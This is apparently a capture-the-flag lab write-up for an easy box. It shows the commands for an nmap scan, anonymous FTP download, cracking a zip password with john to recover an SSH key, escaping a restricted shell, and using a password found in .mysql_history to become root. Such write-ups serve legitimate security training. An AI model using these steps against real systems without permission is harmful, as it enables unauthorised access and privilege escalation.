RATING
Easy
ENUMERATION
Kicking things off with our usual nmap scan:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.201.107
We can see from our nmap scan that anoymous FTP login is allowed, so we proceed to log in:
Command: ftp [email protected]
We download all of the zip files to our local machine for further examination:
Command: prompt (disables confirmation prompts)
Command: mget *.zip
Over on our local machine, we determine that tom.zip is the only one that bear fruit. Because it is password protected, we use zip2john and john to crack it. Once cracked, we are able to extract an id_rsa file:
Command: zip2john tom.zip > tom.hash
Command: john --wordlist=rockyou.txt tom.hash
EXPLOITATION
We can use this id_rsa to SSH to the target machine as user tom:
Command: chmod 600 id_rsa
Command: ssh -i id_rsa [email protected]
Once logged in as tom, we see that we are unable to traverse directories because we are in a restricted shell. Easiest way to escape this shell is to log back out and append -t “bash –noprofile” to our SSH command:
Command: ssh -i id_rsa [email protected] -t "bash --noprofile"
PRIVILEGE ESCALATION
Once logged back in, we are able to change directories. Listing the contents of tom’s home folder, we discover a .mysql_history file:
Command: ls -la
Viewing the contents of this file reveals the command insert\040into\040support\040(tom,\040xx11yy22!); with xx11yy22!, which looks a lot like a password:
Command: cat .mysql_history
Using xx11yy22! as our password, we are able to sudo su to root and read our proof.txt:
Command: sudo su
